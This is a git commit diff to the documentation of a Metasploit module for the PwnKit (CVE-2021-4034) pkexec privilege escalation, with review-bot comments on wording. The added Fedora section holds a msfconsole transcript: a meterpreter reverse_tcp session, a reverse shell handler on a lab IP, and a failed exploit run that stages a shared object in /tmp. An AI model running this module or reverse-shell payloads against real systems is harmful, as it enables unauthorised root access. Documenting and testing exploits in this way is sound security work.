Add Fedora results to docs and some minor final cleanup

bwatters
2022-03-02 09:12:01 -06:00
parent 58aed837b2
commit 06e897436c
4 changed files with 73 additions and 11 deletions
@@ -1,7 +1,7 @@
## Vulnerable Application
The `check` method uses the exploit without a payload. The patched version
will exit without any arguments and give the help menu. Unpatched versiions
will exit without any arguments and give the help menu. Unpatched versions
give the error that the shell was not in the shells folder.
Last Vulnerable Ubuntu packages:
@@ -60,8 +60,70 @@ Source: https://www.ramanean.com/script-to-detect-polkit-vulnerability-in-redhat
### Fedora:
Fedora should be vulnerable, and the check will return showing that it is vulnerable, but
the exploit will fail. I don't know why.
Fedora should be vulnerable, and the pkexec binary will respond like it is vulnerable, but
the exploit will fail. I don't know why, but it still fails with SELinux disabled or using the
original PoCs that compiled a binary on target. The check method just bails if it sees Fedora.
```
msf6 payload(linux/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Fedora 33 (Linux 5.8.15-301.fc33.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > shell
Process 2396 created.
Channel 5 created.
sestatus
SELinux status: disabled
exit
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(linux/x64/meterpreter/reverse_tcp) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set auto
set autocheck set autorunscript set autounhookprocess
set autoloadstdapi set autosysteminfo set autoverifysessiontimeout
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set autoCheck false
autoCheck => false
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > check
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_railgun_api
[*] Checking for pkexec
[*] Checking for /usr/bin/pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Found pkexec version 0.117
[*] The target is not exploitable. Fedora is not supported
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_railgun_api
[*] Started reverse TCP handler on 10.5.135.101:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Checking for pkexec
[*] Checking for /usr/bin/pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.wqogdpzub
[*] /tmp/.wqogdpzub created
[*] Writing '/tmp/.wqogdpzub/kfmlrhrqi/kfmlrhrqi.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.wqogdpzub
[*] Running python /tmp/.wqogdpzub/.skihoukdb /usr/bin/pkexec /tmp/.wqogdpzub/kfmlrhrqi/kfmlrhrqi.so kfmlrhrqi jdtnqzvqn
[*] GLib: Cannot convert message: Could not open converter from “UTF-8” to “jdtnqzvqn”
The value for the SHELL variable was not found the /etc/shells file
This incident has been reported.
[*] Exploit completed, but no session was created.
```
### RedHat:
Untested on Redhat, but I assume similar to Fedora.
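Review bot: the new Fedora section leaves the failure undocumented ("I don't know why") even though the transcript it pastes shows the signature: after `Writing '/tmp/.wqogdpzub/kfmlrhrqi/kfmlrhrqi.so'` the run prints `GLib: Cannot convert message: Could not open converter from "UTF-8" to "jdtnqzvqn"` and then `The value for the SHELL variable was not found the /etc/shells file`, so the prose should at least state that this is what a failed Fedora run looks like so readers can recognise it. Two related points: the run ends with `[!] Verify cleanup of /tmp/.wqogdpzub` and no session, so the doc should tell the reader that the staging directory is left on the target after a failed attempt and must be removed by hand; and the tab-completion noise (`set auto` and the two lines of completions that follow) adds nothing and can be dropped from the transcript.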
@@ -159,7 +221,7 @@ as serving as a location to store the various files and directories created by t
The default value is `/tmp`
### PKEXEC_PATH
This indicates the location of the pkexec binary. Normally, the module can find the binary without help.
This indicates the location of the `pkexec` binary. Normally, the module can find the it without help.
It defaults to nil.
## Advanced Options
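Review bot: the replacement line introduces a new typo while fixing the formatting: "Normally, the module can find the it without help." should read "Normally, the module can find it without help."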
@@ -168,7 +230,7 @@ It defaults to nil.
This indicates the starting directory for the new root-enabled session. The module deletes the working directory
out from under the running payload, so the current working directory for the new session will not exist, and that
can result in odd errors, so we just change to a directory that does exist before user interaction.
It defaults to '/'
It defaults to `/`
## Scenarios
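Review bot: style nit, the sentence "It defaults to `/`" still has no trailing period, while the equivalent line in the previous hunk reads "It defaults to nil."; make the two consistent.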